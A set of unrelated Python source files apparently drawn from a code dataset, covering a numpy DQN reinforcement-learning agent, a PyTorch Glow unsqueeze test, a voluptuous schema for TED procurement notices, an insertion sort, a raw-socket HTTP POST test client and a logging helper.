        rows and is then overwritten oldest-first via ``memory_index``
        (a circular buffer).
        """
        # next_state['isTerminate'] = True or False
        # next_state['data'] = data
        S_A_features = self.get_single_action_features(env, state, action_label)
        next_S_As_features = self.get_all_actions_features(env, next_state)
        T = pd.Series({'S_A_features': S_A_features, 'A': action_label,
                       'R': reward, "S'_As_features": next_S_As_features, 'isTerminate': terminate})
        if self.memory.empty or self.memory.shape[0] < self.memory_capacity:
            # Still filling up: append a new row.
            # NOTE(review): DataFrame.append was removed in pandas 2.x — this
            # code assumes an older pandas; confirm before upgrading.
            self.memory = self.memory.append(T, ignore_index=True)
        else:
            # restrain the memory size: overwrite the oldest row in place
            self.memory.iloc[self.memory_index] = T
            if self.memory_index < self.memory_capacity-1:
                self.memory_index += 1
            else:
                # wrap around to the start of the circular buffer
                self.memory_index = 0
def process_do(self, sub_batch_T, Thetas, cost_queue=None, queue=None, max_action_value_queue=None):
"""
sub_batch_T contains:
S_A_features, A, R, S'_As_features, isTerminate
"""
# all_S_A_features: shape(sample num, features num)
all_S_A_features = np.array([A for A in sub_batch_T['S_A_features'].values]).squeeze(2).T
all_Q = self.get_Q(all_S_A_features, Thetas)
# all_y_predict: shape(sample num, 1)
all_y_predict = all_Q
# all_next_S_As_features: shape(sample num, (features num, all_actions) )
all_next_S_As_features = sub_batch_T["S'_As_features"].values
all_next_Q_max = self.get_next_Q_max(all_next_S_As_features)
# all_isTerminate: shape(sample num, 1)
all_isTerminate = sub_batch_T['isTerminate'][:, np.newaxis]
# next_Q_max = 0 if it's terminate state
np.place(all_next_Q_max, all_isTerminate, 0)
all_reward = sub_batch_T['R'][:, np.newaxis]
# all_y: shape(sample num, 1)
all_y = all_reward + self.gamma * all_next_Q_max
Gradients = self.get_gradients_back_propagate(all_y, all_y_predict, Thetas)
thetas_sum = 0
for thetas in self.Thetas:
thetas_sum += np.square(thetas[1:, :]).sum(0).sum()
cost = 1 / (2 * len(sub_batch_T)) * \
(np.square(all_y-all_y_predict).sum(0).sum() + self.lambda_reg * thetas_sum)
max_action_value = np.max(all_next_Q_max)
print('Max action value: ', max_action_value)
if queue == None and cost_queue == None:
return [Gradients, cost, max_action_value]
else:
queue.put(Gradients)
cost_queue.put(cost)
max_action_value_queue.put(max_action_value)
    def get_deltaTheta(self, Gradients):
        """
        Calculate the deltaTheta (parameter update) for gradient descent.

        Parameters
        ----------
        Gradients:
            Flattened gradients from back propagation.

        Returns
        -------
        deltaTheta:
            Update of the same shape as ``Gradients``; the method chosen by
            ``self.alpha_method`` ('Annealing', 'Momentum', 'RMSProp',
            'RMSProp_DQN' or 'Adam') decides how it is scaled.

        Notes
        -----
        Optimizer state (last_deltaTheta / g / h / m / v) is lazily created
        on first use via the try/except AttributeError pattern.
        """
        # alpha
        if self.alpha_method == 'Annealing':
            # Annealing alpha: 1/t learning-rate schedule
            if self.alpha > self.min_alpha and self.enable_alpha_decrease == True:
                self.alpha = self.init_alpha/(1+self.learning_time/self.search_time)
            deltaTheta = self.alpha*Gradients
        elif self.alpha_method == 'Momentum':
            try:
                self.last_deltaTheta
            except AttributeError:
                print('Initialise last deltaTheta')
                self.last_deltaTheta = np.zeros_like(Gradients)
            if self.alpha > self.min_alpha and self.enable_alpha_decrease == True:
                self.alpha = self.init_alpha/(1+self.learning_time/self.search_time)
            # classical momentum: accumulate a velocity term
            deltaTheta = self.momentum * self.last_deltaTheta + self.alpha * Gradients
            self.last_deltaTheta = deltaTheta
        elif self.alpha_method == 'RMSProp':
            # RMSProp: per-parameter rate scaled by a running mean of g^2
            try:
                self.g
            except AttributeError:
                print('Initialise cached gradients')
                self.g = np.zeros_like(Gradients)
            self.g = self.squ_grad_momentum * self.g + (1-self.squ_grad_momentum) * Gradients**2
            learning_rate = self.alpha / (np.sqrt(self.g + self.min_squ_grad))
            deltaTheta = learning_rate*Gradients
            self.average_learning_rate = np.mean(learning_rate)
        elif self.alpha_method == 'RMSProp_DQN':
            # RMSProp variant used in the DQN paper: centred second moment
            try:
                self.g, self.h
            except AttributeError:
                print('Initialise cached gradients')
                self.g = np.zeros_like(Gradients)
                self.h = np.zeros_like(Gradients)
            self.g = self.squ_grad_momentum * self.g + (1-self.squ_grad_momentum) * Gradients**2
            self.h = self.momentum * self.h + (1-self.momentum) * Gradients
            # variance estimate; clamp negatives from numerical error to 0
            value = self.g - self.h**2
            np.place(value, value<0, 0)
            learning_rate = self.alpha/(np.sqrt(value + self.min_squ_grad))
            deltaTheta = learning_rate * Gradients
            self.average_learning_rate = np.mean(learning_rate)
        elif self.alpha_method == 'Adam':
            # Adam: first (m) and second (v) moment estimates
            # NOTE(review): bias correction of m and v is omitted — confirm
            # this is intentional.
            try:
                self.v, self.m
            except AttributeError:
                print('Initialise m, v')
                self.v = np.zeros_like(Gradients)
                self.m = np.zeros_like(Gradients)
            self.m = self.momentum * self.m + (1-self.momentum) * Gradients
            self.v = self.squ_grad_momentum * self.v + (1-self.squ_grad_momentum) * Gradients**2
            learning_rate = self.alpha / (np.sqrt(self.v + self.min_squ_grad))
            deltaTheta = learning_rate * self.m
            self.average_learning_rate = np.mean(learning_rate)
        else:
            raise NameError('No alpha method name %s' % self.alpha_method)
        return deltaTheta
    def update_Theta(self):
        """Run one learning step: sample a mini-batch, compute gradients
        (optionally fanned out over several worker processes), apply the
        update to ``self.Thetas`` and periodically refresh the fixed target
        network ``self.fixed_Thetas``.
        """
        print('\nLearning step: {0} || Memory size: {1}'.format(
            self.learning_time, self.memory.shape[0]))
        self.learning_time += self.batch_size
        batch_T = self.sample_mini_batch(self.memory)
        # resolve the number of worker processes
        if self.n_jobs == -1:
            core_num = cpu_count()
        elif self.n_jobs <= 0 or self.n_jobs>cpu_count():
            raise AttributeError('n_job wrong.')
        else:
            core_num = self.n_jobs
        Thetas = self.Thetas
        if core_num > 1:
            # core_num > 1: split the batch and compute gradients in parallel
            batch_T_split = np.array_split(batch_T, core_num)
            queue = Queue()
            cost_queue = Queue()
            max_action_value_queue = Queue()
            processes = []
            for core in range(core_num):
                P = Process(target=self.process_do, args=(batch_T_split[core], Thetas, cost_queue, queue, max_action_value_queue))
                processes.append(P)
                P.start()
            for i in range(core_num):
                processes[i].join()
            # gather results: gradients are summed, costs averaged,
            # and the largest max-Q across workers is kept
            Gradients = queue.get()
            cost = cost_queue.get()
            max_action_value = [max_action_value_queue.get()]
            for i in range(core_num-1):
                Gradients = np.vstack((Gradients, queue.get()))
                cost += cost_queue.get()
                max_action_value.append(max_action_value_queue.get())
            cost = cost/core_num
            max_action_value = max(max_action_value)
            Gradients = Gradients.sum(axis=0)
        else:
            # core_num = 1: compute in-process
            Gradients, cost, max_action_value = self.process_do(batch_T, Thetas)
        # record cost history
        # NOTE(review): Series.set_value was removed in modern pandas; this
        # assumes an older pandas version — confirm before upgrading.
        if self.learning_time % self.batch_size == 0:
            self.cost_his.set_value(self.learning_time, cost)
            self.max_action_value_his.set_value(self.learning_time, max_action_value)
        # epsilon: decay exploration down to a floor of 0.1
        if self.epsilon > 0.1:
            self.epsilon = self.epsilon * self.epsilon_decay_rate
        else:
            self.epsilon = 0.1
        deltaTheta = self.get_deltaTheta(Gradients)
        # Gradient update: deltaTheta is flat, so carve off one layer's worth
        # of values at a time and reshape it to that layer's Theta shape
        Thetas_layers = self.n_layers-1
        Thetas_shapes = [self.Thetas[i].shape for i in range(Thetas_layers)]
        for i, shape in enumerate(Thetas_shapes):
            Thetas_backup = Thetas[i] + deltaTheta[:shape[0]*shape[1]].reshape(shape)
            deltaTheta = deltaTheta[shape[0]*shape[1]:].copy()
            # crude divergence guard: skip the update if weights explode
            if np.abs(Thetas_backup).max() > 20:
                print('\n\n\n!!!!! Warning, Thetas overshooting, turn alpha down!!!\n\n\n')
            else:
                self.Thetas[i] = Thetas_backup
        # Change fixed Theta: refresh the target network every
        # target_theta_update_frequency parameter updates
        if self.swap_Theta_counting >= self.target_theta_update_frequency:
            self.swap_Theta_counting += self.batch_size - self.target_theta_update_frequency
            self.fixed_Thetas = self.Thetas.copy()
            print("\n\n\n## Swap Thetas ##\n\n")
        else:
            self.swap_Theta_counting += self.batch_size
    def forward_propagate(self, features, Thetas, for_bp=False):
        """
        Forward pass through the network.

        Input:
            if for_bp = False:
                features: shape(features num, actions num)
            else:
                features: shape(features num, samples num)
            for_bp: when True, cache per-layer activations (self.As_4_bp)
                and pre-activations (self.Zs) on the instance for the
                subsequent back-propagation pass — a deliberate side effect.
        --------------------------
        return:
            A: shape(1, action num)
        """
        A = features.copy()
        if for_bp:
            self.As_4_bp = []
            # Zs[0] is a placeholder: the input layer has no pre-activation
            self.Zs = [None]
        for i in range(1, self.n_layers):
            # prepend the bias row of ones before applying the weights
            A = np.vstack((np.ones((1, A.shape[1])), A))  # [1, a1, a2, a3].T
            if for_bp:
                self.As_4_bp.append(A)  # layer1 to n-1
            # layer i + 1
            Z = Thetas[i-1].dot(A)
            A = self.calculate_AF(Z, i)  # [a1, a2, a3].T
            if for_bp:
                self.Zs.append(Z)
        return A
def calculate_AF(self, A, layer):
X = A.copy()
if layer < self.n_layers-1:
# nonlinear activation function
if self.activation_function == 'ReLU':
y = X.clip(0)
elif self.activation_function == 'SoftPlus':
y = np.log(1+np.exp(X))
else:
raise NameError(self.activation_function, ' is not in the name list')
else:
# linear activation function
y = X
return y
    def get_gradients_back_propagate(self, all_y, all_A, Thetas):
        """Back-propagate the TD error and return flattened gradients.

        Relies on ``self.As_4_bp`` / ``self.Zs`` cached by the preceding
        ``forward_propagate(..., for_bp=True)`` call.  Gradients for all
        layers are concatenated into one flat array (input layer last),
        averaged over ``self.batch_size``.
        """
        last_layer = self.n_layers-1
        gradients = np.array([])
        # walk the layers backwards, accumulating deltas
        for i in range(last_layer, 0, -1):
            # ignore +1 in every A's beginning
            if i == last_layer:
                all_error = (all_y - all_A).T  # all_error: shape(n_actions, n_samples)
            else:
                # propagate error through the weights, dropping the bias row
                all_error = (Thetas[i].T.dot(all_delta))[1:]
            all_delta = all_error * self.calculate_AFD(self.Zs[i].copy(), layer=i)
            if self.lambda_reg is not None:
                # regularization term (bias column excluded):
                regularization = self.lambda_reg*Thetas[i-1]
                regularization[:, 0] = 0
                # errors: shape(n_hidden_units, last_n_hidden_units)
                gradients_for_current_layer = np.dot(all_delta, self.As_4_bp[i-1].T) + regularization
            else:
                # errors: shape(n_hidden_units, last_n_hidden_units)
                gradients_for_current_layer = np.dot(all_delta, self.As_4_bp[i-1].T)
            # prepend so the final flat array is ordered input -> output
            gradients = np.append(gradients_for_current_layer, gradients)
        Gradients = gradients/self.batch_size
        return Gradients
def calculate_AFD(self, A, layer):
X = A.copy()
if layer < self.n_layers-1:
if self.activation_function == 'ReLU':
np.place(X, np.array(X > 0), 1)
d = X.clip(0)
elif self.activation_function == 'SoftPlus':
d = 1/(1 + np.exp(-X))
else:
raise NameError(self.activation_function, ' is not in the name list')
else:
d = np.ones_like(X)
return d
def sample_mini_batch(self, memory):
"""
Batch consist recent and old transitions.
The default is 10% recent and 90% old transitions.
Parameters
----------
memory: all transitions that in the memory.
Returns
-------
sampled batch
"""
if memory.shape[0] < self.batch_size:
batch_size = memory.shape[0]
else:
batch_size = self.batch_size
rec_his_size = int(batch_size*self.rec_his_rate)
old_his_size = batch_size - rec_his_size
rec_index = np.random.choice(memory.index[-batch_size:], rec_his_size, replace=False)
old_index = np.random.choice(memory.index[:-batch_size], old_his_size, replace=False)
index = np.concatenate((rec_index, old_index))
np.random.shuffle(index)
batch = memory.ix[index, :] # this is an array
return batch
def update_environment(self, state, action_label, env):
action = self.actions[action_label]
env.update_environment(state, action)
def get_single_action_features(self, env, state, action_label):
"""
return:
features: np.array, shape(feature num, 1)
"""
action = self.actions[action_label]
features = env.get_features(state, actions_array=np.array([[action]])) # np.array([[1,2,3,4]]).T shape=(n,1)
return features
def get_all_actions_features(self, env, next_state):
"""
return:
all_features: pd.DataFrame, shape(feature num, action num)
"""
# np.array([[1,2,3,4]]).T shape=(n,1)
F_As = env.get_features(next_state, actions_array=self.actions.values[np.newaxis, :])
all_features = pd.DataFrame(F_As, columns=self.actions.index)
return all_features
    def get_Q(self, features, Thetas):
        """
        Q-values for a batch of (state, action) feature columns.

        Parameters
        ----------
        features
            shape(feature num, sample num)
        Returns
        -------
        all_Q:
            shape(sample num, 1)

        Note: for_bp=True makes forward_propagate cache activations on
        ``self`` for the backward pass that follows — a deliberate side
        effect of calling this method.
        """
        all_Q = self.forward_propagate(features, Thetas, for_bp=True).T
        return all_Q
    def get_next_Q_max(self, all_next_S_As_features):
        """
        max_a Q(s', a) per sample, evaluated with the FIXED target network
        (``self.fixed_Thetas``) as in the DQN target computation.

        Parameters
        ----------
        all_next_S_As_features:
            shape(sample num, (features num, all_actions) )
        Returns
        -------
        all_next_Q_max:
            shape(sample num, 1)
        """
        all_next_Q_max = np.empty((0,1))
        for next_S_As_features in all_next_S_As_features:
            # next_S_As_features: shape(features num, all_actions)
            Q_max = self.forward_propagate(next_S_As_features, self.fixed_Thetas, for_bp=False).max()
            all_next_Q_max = np.append(all_next_Q_max, Q_max)
        # reshape flat results into a (sample num, 1) column
        all_next_Q_max = all_next_Q_max[:, np.newaxis]
        return all_next_Q_max
    def get_all_q_and_all_features(self, env, state):
        """
        Given state and env, compute q-values for every action.

        for a in all_action(S): # current state S
        X_A[a] = [x0, x1, x2...].T
        q_cap[a] = F_A[a].T * W

        Returns [all_q, all_features].  The network weights are lazily
        initialised here on the first call: forward_propagate raises
        TypeError while self.Thetas is still None, which triggers random
        initialisation of both Thetas and fixed_Thetas in [-0.1, 0.1).
        """
        # F = np matrix = axis0: features value, axis1: actions
        F = env.get_features(state, actions_array=self.actions.values[np.newaxis, :])
        # all_features = pd.DataFrame, axis0: feature value, axis1: actions
        all_features = pd.DataFrame(F, columns=self.actions.index)
        try:
            # all_q: pd.Series q for all actions
            all_q = pd.Series(self.forward_propagate(all_features, self.Thetas).ravel(), index=self.actions.index)
        except TypeError:
            # create fixed Theta and Theta, random initial theta, shape(n_hidden_units, features)
            if self.n_hidden_units == None:
                # default width: twice the (biased) input size
                self.n_hidden_units = 2*(F.shape[0]+1)
            self.fixed_Thetas = []
            # nonlinear activation function (input -> first hidden layer)
            self.fixed_Thetas.append(np.random.random((self.n_hidden_units, F.shape[0]+1)) * (2*0.1) - 0.1)
            if self.n_layers > 3:
                # nonlinear activation function (hidden -> hidden layers)
                for i in range(self.n_layers-3):
                    self.fixed_Thetas.append(
                        np.random.random((self.n_hidden_units, self.n_hidden_units+1)) * (2*0.1) - 0.1)
            # linear activation function (last hidden -> single output)
            self.fixed_Thetas.append(np.random.random((1, self.n_hidden_units+1)) * (2*0.1) - 0.1)
            self.Thetas = self.fixed_Thetas.copy()
            all_q = pd.Series(self.forward_propagate(all_features, self.Thetas).ravel(), index=self.actions.index)
        return [all_q, all_features]
    def choose_action(self, all_q):
        """
        Choose action A = argmax_a(q_cap) with probability 1-epsilon, else a random action.
        """
        if np.random.random() <= 1 - self.epsilon:
            # choose optimal action; shuffle first so ties between equal
            # q-values are broken randomly rather than by position
            all_q = all_q.reindex(np.random.permutation(all_q.index))
            # NOTE(review): Series.argmax returned the index *label* in older
            # pandas; modern pandas returns a positional int (idxmax returns
            # the label) — confirm the pandas version this project pins.
            action_label = all_q.argmax(skipna=False)
        else:
            # random choose action (exploration)
            action_label = np.random.choice(self.actions.index)
        return action_label
    def get_optimal_action(self, all_features):
        """
        This is for applying this trained model (pure greedy, no epsilon).

        Parameters
        ----------
        all_features: all features, not include 1 (bias term)
        Returns
        -------
        The optimal action (the action *value*, not its label)
        """
        all_Features = pd.DataFrame(all_features, columns=self.actions.index)
        # all_q: pd.Series q for all actions
        all_q = pd.Series(self.forward_propagate(all_Features, self.Thetas).ravel(), index=self.actions.index)
        # shuffle so ties between equal q-values are broken randomly
        all_q = all_q.reindex(np.random.permutation(all_q.index))
        # NOTE(review): Series.argmax returned the *label* in older pandas;
        # modern pandas returns a position — confirm the pinned version.
        action_label = all_q.argmax(skipna=False)
        action = self.actions[action_label]
        return action
def get_config(self):
all_configs = pd.Series({'Thetas': self.Thetas, 'fixed_Thetas': self.fixed_Thetas, 'learning_time': self.learning_time,
'alpha': self.alpha, 'memory': self.memory, 'epsilon': self.epsilon, 'actions': self.actions,
})
return all_configs
def set_config(self, config):
self.Thetas, self.fixed_Thetas, self.learning_time, self.alpha, self.memory, self.epsilon, self.actions, \
= config['Thetas'], config['fixed_Thetas'], config['learning_time'], config['alpha'], \
config['memory'], config['epsilon'], config['actions'] | StarcoderdataPython |
8130453 | from __future__ import absolute_import, division, print_function, unicode_literals
import torch
from tests import utils
class SimpleUnsqueezeModel(torch.nn.Module):
    """Doubles its input and unsqueezes the result along ``dimension``.

    With ``inplace=True`` the in-place ``Tensor.unsqueeze_`` variant is
    exercised; otherwise the functional ``torch.unsqueeze`` is used.
    """

    def __init__(self, dimension, inplace=False):
        super(SimpleUnsqueezeModel, self).__init__()
        self.dimension = dimension
        self.inplace = inplace

    def forward(self, tensor):
        doubled = tensor + tensor
        if self.inplace:
            return doubled.unsqueeze_(self.dimension)
        return torch.unsqueeze(doubled, self.dimension)
class TestUnsqueeze(utils.TorchGlowTestCase):
    """Glow lowering tests for aten::unsqueeze, covering every positive
    dimension of a rank-3 input, a negative dimension, and the in-place
    variant."""

    @utils.deterministic_expand(
        [
            lambda: ("dim0", SimpleUnsqueezeModel(0), torch.randn(2, 3, 4)),
            lambda: ("dim1", SimpleUnsqueezeModel(1), torch.randn(2, 3, 4)),
            lambda: ("dim2", SimpleUnsqueezeModel(2), torch.randn(2, 3, 4)),
            lambda: ("dim3", SimpleUnsqueezeModel(3), torch.randn(2, 3, 4)),
            lambda: ("dim_negative", SimpleUnsqueezeModel(-1), torch.randn(2, 3, 4)),
            lambda: (
                "inplace",
                SimpleUnsqueezeModel(-1, inplace=True),
                torch.randn(2, 3, 4),
            ),
        ]
    )
    def test_unsqueeze(self, _, module, tensor):
        # Compare traced execution paths and require unsqueeze to be fused.
        utils.compare_tracing_methods(module, tensor, fusible_ops=["aten::unsqueeze"])
| StarcoderdataPython |
11362544 | <gh_stars>0
import os
import re
import pandas as pd
from extractor import extract
from voluptuous import (Schema, Required, All, Optional, Length, Any,
MultipleInvalid, Match, Coerce)
# Lookups
# Code tables shipped with the project: each CSV maps a TED notice code to
# its label.  All columns are read as strings so codes keep leading zeros.
# ISO_COUNTRY uses keep_default_na=False, presumably so the country code
# "NA" (Namibia) is not parsed as a missing value, and latin encoding for
# accented labels — TODO confirm.
iso_country = pd.read_csv('./Lookups/ISO_COUNTRY.csv', dtype='str',
                          encoding='latin', keep_default_na=False)
cpv = pd.read_csv('./Lookups/CPV.csv', dtype='str')
ma = pd.read_csv('./Lookups/MA_MAIN_ACTIVITY.csv', dtype='str')
td = pd.read_csv('./Lookups/TD_DOCUMENT_TYPE.csv', dtype='str')
nc = pd.read_csv('./Lookups/NC_CONTRACT_NATURE.csv', dtype='str')
aa = pd.read_csv('./Lookups/AA_AUTHORITY_TYPE.csv', dtype='str')
pr = pd.read_csv('./Lookups/PR_PROC.csv', dtype='str')
ty = pd.read_csv('./Lookups/TY_TYPE_BID.csv', dtype='str')
ac = pd.read_csv('./Lookups/AC_AWARD_CRIT.csv', dtype='str')
rp = pd.read_csv('./Lookups/RP_REGULATION.csv', dtype='str')
# Allowed Currencies
currencies = ['EUR', 'BGN', 'CHF', 'USD', 'HRK', 'CZK', 'DKK', 'HUF', 'SEK',
              'NOK', 'LTL', 'TRY', 'PLN', 'MKD', 'RON', 'JPY', 'ISK', 'SKK',
              'LVL', 'GBP', 'MTL', 'CYP', 'EEK']
def number(s):
    """Parse a localized numeric string into a float.

    Commas are treated as decimal points, percent signs and all whitespace
    (thousands separators) are dropped: ``'1 234,5%'`` -> ``1234.5``.
    """
    normalized = s.replace(',', '.').replace('%', '')
    normalized = re.sub(r'\s', '', normalized)
    return float(normalized)
def concatenate(lst):
    """Join a list of strings into one space-separated string."""
    return " ".join(lst)
def flat(lst):
    """Return the first (and assumed only) element of a one-item list.

    Used with voluptuous ``Coerce`` to unwrap single-element XML lists.
    """
    return lst[0]
# Sub Schemas
# A monetary value: optional whitelisted currency, any other key is either
# an empty list, an unwrapped number, or an unwrapped string (left as-is).
value = Schema({
    Optional('CURRENCY'): All(str, Any(*currencies)),
    Optional(str): Any([], All(Coerce(flat), Coerce(number)),
                       All(Coerce(flat), str))  # Let it pass
})
contract_value = Schema({
    Optional(str): value,
    Optional('NUMBER_OF_YEARS'): Any([], All(Coerce(flat), Coerce(number)),
                                     All(Coerce(flat), str)),  # Let it pass
    Optional('NUMBER_OF_MONTHS'): Any([], All(Coerce(flat), Coerce(number)),
                                      All(Coerce(flat), str))  # Let it pass
})
contractor = Schema({
    Optional(str): Any([], All(Coerce(flat), str)),
    Optional('COUNTRY'): Any([], All(Coerce(flat), str, Length(2),
                                     Any(*iso_country.Code)))
})
# NUTS/CPV codes must start with a known country / CPV prefix.
match_nuts = Match('^(' + '|'.join(iso_country.Code) + ')')
match_cpv = Match('^(' + '|'.join(cpv.CODE) + ')')
# Document Schema: validates one extracted TED notice document.
schema = Schema({
    Required('DOC_ID'): str,
    Required('CODED_DATA'): {
        Required('NOTICE_DATA'): {
            Required('NO_DOC_OJS'): All(Coerce(flat), str),
            Required('ORIGINAL_NUTS'): [All(str, match_nuts)],
            Required('ORIGINAL_CPV'): [All(str, match_cpv)],
            Required('ISO_COUNTRY'): All(Coerce(flat), str, Length(2),
                                         Any(*iso_country.Code)),
            Required('IA_URL_GENERAL'): Any([], All(Coerce(flat), str)),
            Required('REF_NOTICE'): [str],
            Required('VALUES_LIST'): {
                Optional('GLOBAL_VALUE'): value,
                Optional('CONTRACTS_VALUE'): [value]
            }
        },
        # Codified metadata: every field must match its lookup table.
        Required('CODIF_DATA'): {
            Required('DS_DATE_DISPATCH'): All(Coerce(flat), str),
            Required('TD_DOCUMENT_TYPE'): All(Coerce(flat), str,
                                              Any(*td.CODE)),
            Required('AA_AUTHORITY_TYPE'): All(Coerce(flat), str,
                                               Any(*aa.CODE)),
            Required('NC_CONTRACT_NATURE'): All(Coerce(flat), str,
                                                Any(*nc.CODE)),
            Required('PR_PROC'): All(Coerce(flat), str, Any(*pr.CODE)),
            Required('RP_REGULATION'): All(Coerce(flat), str, Any(*rp.CODE)),
            Required('TY_TYPE_BID'): All(Coerce(flat), str, Any(*ty.CODE)),
            Required('AC_AWARD_CRIT'): All(Coerce(flat), str, Any(*ac.CODE)),
            Required('MA_MAIN_ACTIVITIES'): [All(str, Any(*ma.CODE))]
        }
    },
    Required('CONTRACT'): {
        Required('OTH_NOT'): All(Coerce(flat), str, Any('YES', 'NO')),
        Optional('CONTRACTING_AUTHORITY'): All(Coerce(flat), str),
        Optional('CONTRACT_OBJECT'): {
            Optional('NUTS'): [All(str, match_nuts)],
            Optional('NUTS_EXTRA'): All(Coerce(concatenate), str),
            Optional('CPV_MAIN'): Any([], All(Coerce(flat), str, match_cpv)),
            Optional('CONTRACT_VALUE'): contract_value,
            # remaining keys are YES/NO flags (or empty)
            Optional(str): Any([], All(Coerce(flat), str, Any('YES', 'NO'))),
        },
        Optional('AWARDS_OF_CONTRACT'): [{
            Optional('CONTRACTOR'): contractor,
            Optional('CONTRACT_VALUE'): contract_value,
        }]
    }
})
def prune(node):
    """Recursively delete falsy entries ([], '', 0, None, ...) from nested
    dicts, in place.  Lists are traversed but never shrunk themselves."""
    if isinstance(node, dict):
        # iterate over a snapshot of the keys so deletion is safe
        for key in list(node.keys()):
            if node[key]:
                prune(node[key])
            else:
                del node[key]
    elif isinstance(node, list):
        for element in node:
            prune(element)
if __name__ == "__main__":
    # Initial values are leftovers; both are overwritten by the loops below.
    Y = '2013'
    M = '01'
    years = ['2013', '2014', '2015', '2016']
    months = ['01', '02', '03', '04', '05', '06', '07', '08',
              '09', '10', '11', '12']
    collection = []
    for Y in years:
        print(Y)
        for M in months:
            print(M)
            # Folder containing xml files
            DIR = os.path.join('/Volumes/WD/S8', Y + '-' + M)
            # List xml files
            files = os.listdir(DIR)
            for f in files:
                # Extract data from xml file
                file_path = os.path.join(DIR, f)
                data = extract(file_path)
                try:
                    # validate/coerce against the document schema
                    data = schema(data)
                except MultipleInvalid as e:
                    # validation failure: report but keep the raw document
                    print(str(e) + ' ---- file: ' + file_path)
                prune(data)
                collection.append(data)
            print(collection)
            # NOTE(review): this break stops after the FIRST month of every
            # year — looks like leftover debugging; confirm before relying
            # on this script for a full run.
            break
| StarcoderdataPython |
52506 | <reponame>MichaelWiciak/SortingAlgorithms
def insertionSort(aList):
    """Sort *aList* in place, ascending, using insertion sort (O(n^2)).

    Args:
        aList: mutable sequence of mutually comparable items.
    Returns:
        None; *aList* is mutated.
    """
    for current in range(1, len(aList)):
        value = aList[current]
        pos = current - 1
        # Shift larger items one slot right until value's position is found.
        # Bug fix: the bounds check `pos >= 0` must come FIRST — the original
        # evaluated `aList[Pointer] > CurrentValue` before it, silently
        # reading aList[-1] (the last element) via negative indexing once
        # Pointer reached -1.
        while pos >= 0 and aList[pos] > value:
            aList[pos + 1] = aList[pos]
            pos -= 1
        aList[pos + 1] = value
| StarcoderdataPython |
1619678 | <reponame>jcnelson/syndicate<gh_stars>10-100
#!/usr/bin/python
# Python 2 script (print statements, urllib2): hand-crafts a raw HTTP/1.0
# POST with a Content-Range header and Basic auth, sends it over a plain
# socket, and prints the request and the first 16 KiB of the response.
# Usage: script.py <hostname> <port> <filename> <data> [offset]
import socket
import time
import sys
import urllib2
import base64
auth = "<PASSWORD>:<PASSWORD>"
hostname = sys.argv[1]
port = int(sys.argv[2] )
filename = sys.argv[3]
data = sys.argv[4]
offset = 0
if len(sys.argv) > 5:
    # optional byte offset for the Content-Range header
    offset = int(sys.argv[5])
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.connect( (hostname, port) )
# Assemble the request by hand; headers end with a blank line, then the body.
http_m = ""
http_m += "POST %s HTTP/1.0\r\n" % filename
http_m += "Host: t510\r\n"
http_m += "Authorization: Basic %s\r\n" % base64.b64encode(auth)
http_m += "Content-Length: %s\r\n" % len(data)
http_m += "Content-Type: application/octet-stream\r\n"
http_m += "Content-Range: bytes=%s-%s\r\n" % (offset, offset + len(data) - 1)
http_m += "\r\n";
http_m += data
print "<<<<<<<<<<<<<<<<<<<<<<<<<"
print http_m
print "<<<<<<<<<<<<<<<<<<<<<<<<<\n"
s.send( http_m )
# single recv — assumes the whole response fits in 16 KiB
ret = s.recv(16384)
print ">>>>>>>>>>>>>>>>>>>>>>>>>"
print ret
print ">>>>>>>>>>>>>>>>>>>>>>>>>\n"
s.close()
| StarcoderdataPython |
1652482 | <reponame>sheepy0125/hisock
# import pytest
# from server import start_server
# from client import connect
# from utils import get_local_ip
| StarcoderdataPython |
9783126 | <reponame>Arusey/Porfolio-website<gh_stars>0
# Generated by Django 3.1.6 on 2021-02-21 07:14
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the optional ``category_style`` CharField to the Project model."""

    dependencies = [
        ('portfolio', '0003_auto_20210221_0617'),
    ]

    operations = [
        migrations.AddField(
            model_name='project',
            name='category_style',
            # nullable and blankable so existing rows need no default
            field=models.CharField(blank=True, max_length=50, null=True),
        ),
    ]
| StarcoderdataPython |
7337 | <gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" Module Name
Description...
"""
__author__ = "<NAME>"
__copyright__ = "Copyright 2021, <NAME>"
__credits__ = ["<NAME>","etc."]
__date__ = "2021/04/12"
__license__ = "GPL"
__version__ = "1.0.0"
__pythonversion__ = "3.9.1"
__maintainer__ = "<NAME>"
__contact__ = "<EMAIL>"
__status__ = "Development"
import sys, os
import logging
import inspect
import datetime
STD_LOG_FORMAT = ("%(asctime)s - %(levelname)s - %(name)s - %(filename)s - %(funcName)s() - ln.%(lineno)d"
" - %(message)s")
def file_logger(filename: str,
                level: int = logging.DEBUG,
                format: str = STD_LOG_FORMAT):
    """Return the module logger with a file handler attached for *filename*.

    Args:
        filename: path of the log file to write to.
        level: logging level for both the logger and the handler.
        format: record format string (``format`` shadows the builtin, but is
            kept for backward compatibility with keyword callers).

    Returns:
        The configured ``logging.Logger``.

    Note: all calls share the same underlying logger (named after this
    module), so records go to every attached file — TODO confirm that is
    the intended multi-file behaviour.
    """
    logger = logging.getLogger(__name__)
    logger.setLevel(level)
    # Bug fix: previously every call appended another FileHandler, so calling
    # this twice for the same file duplicated every log record.  Only attach
    # a handler if one for this file is not already present.
    target = os.path.abspath(filename)
    already_attached = any(
        isinstance(h, logging.FileHandler) and h.baseFilename == target
        for h in logger.handlers
    )
    if not already_attached:
        formatter = logging.Formatter(format)
        file_handler = logging.FileHandler(filename)
        file_handler.setLevel(level)
        file_handler.setFormatter(formatter)
        logger.addHandler(file_handler)
    return logger
def prompt_logger(error):
    """Print a formatted report for *error* and return the same data as a dict.

    The caller's filename is taken from the stack, so the report shows where
    prompt_logger was invoked from.
    """
    caller = inspect.getframeinfo(inspect.stack()[1][0])
    error_log = {
        "error_type": error.__class__.__name__,
        "error_info": error.__doc__,
        "error_line": error.__traceback__.tb_lineno,
        "error_file": os.path.basename(caller.filename),
        "error_time": datetime.datetime.now(),
        "error_details": str(error).capitalize(),
    }
    print("----- ERROR -----")
    for label in ("type", "info", "line", "file", "time"):
        print(label.capitalize() + ":", error_log["error_" + label])
    print("Details:", error_log["error_details"])
    return error_log
def error_box():
    """Placeholder for a GUI error dialog — not yet implemented."""
    pass
def sql_logger():
    """Placeholder for logging errors to a SQL store — not yet implemented."""
    pass
if __name__ == "__main__":
pass | StarcoderdataPython |
11390394 | <reponame>Andrei486/class_export<gh_stars>0
import logging
